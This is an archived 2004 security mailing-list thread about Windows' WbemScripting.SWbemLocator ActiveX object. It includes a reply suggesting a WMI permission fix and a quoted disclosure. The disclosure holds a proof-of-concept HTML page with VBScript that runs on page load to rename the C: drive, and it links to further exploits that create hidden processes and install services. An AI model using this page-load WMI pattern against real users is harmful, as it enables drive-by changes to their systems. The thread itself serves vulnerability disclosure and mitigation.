Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Vulnerability Development: [SPAM] RE: WbemScripting.SWbemLocator - createobject allows... EVERYTHING!

[SPAM] RE: WbemScripting.SWbemLocator - createobject allows... EVERYTHING!

From: jasonk <jasonk_at_bluedevel.com>
Date: Fri, 5 Mar 2004 10:05:23 +1100

Hi Bartosz,

If you run as an administrator, and allow unrestricted ActiveX access, this
is no different to any other exploit. If the activex was a trojan and you
allowed full scripted access, there is the same effect.

However I imagine this can be used with some crossing the boundaries to My
Computer, and then an attack effected much more easily than a "known file
location" vuln.

For a temporary fix, under xp:

Open Computer Management, Services and Applications-> right click WMI
Control, choose Properties.

Then, Deny "provider write" and "execute methods" for the cimv2 namespace.
This quite possibly WILL affect other applications on the computer, but
should prevent this from occuring.

Otherwise, I don't know enough about WMI to be able to say how to disable
certain applications. Anyone help?

jasonk
> -----Original Message-----
> From: Bartosz Kwitkowski [mailto:bartosz_at_wb.pl]
> Sent: Friday, 5 March 2004 8:24 AM
> To: vuln-dev_at_securityfocus.com
> Subject: WbemScripting.SWbemLocator - createobject allows...
> EVERYTHING!
>
>
>
> I would like to dedicate this discovery to Justyna.
>
>
>
> WbemScripting.SWbemLocator - this object has access to WMI in
> Win XP ( i have Prof fully patched). , 2003 , any NT? I
> think, this vuln concerns all Windows where we can find
> WbemScripting.SWbemLocator.
>
>
>
> I would not like to publish more exploits because of their
> dangerous use
>
>
>
> more examples are at:
>
>
>
> http://wb.pl/bartosz/wbem/process.htm - create process in
> hidden window
>
> http://wb.pl/bartosz/wbem/installservice.htm - installs service
>
> http://wb.pl/bartosz/wbem/changevolume.htm - changes volume of C:
>
>
>
> HOME PAGE - http://wb.pl/bartosz/
>
>
>
> example source:
>
> <HTML>
>
> <HEAD>
>
> <TITLE>Change volume of disk</TITLE>
>
> &lt;SCRIPT LANGUAGE="VBScript">
>
>
>
> // I would like to dedicate this discovery to Justyna.
>
>
>
> Sub window_onload
>
> const impersonation = 3
>
>
>
>
>
>
>
> Set Locator = CreateObject("WbemScripting.SWbemLocator")
>
> Set Service = Locator.ConnectServer()
>
> Service.Security_.ImpersonationLevel=impersonation
>
>
>
> Set Process = Service.Get("Win32_LogicalDisk=""C:""")
>
>
>
>
>
> Process.VolumeName = "bartosz kwitkowski
>
> Process.Put_
>
>
>
>
>
> end sub
>
>
>
> &lt;/SCRIPT&gt;
>
> </HEAD>
>
> <BODY>
>
> I would like to dedicate this discovery to Justyna.
>
> </BODY>
>
> </HTML>
>
>
>
>
>
> ANY QUESTIONS? ASK ME!
>
>

  • application/x-pkcs7-signature attachment: smime_p7s
Received on Mar 05 2004
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
edgeos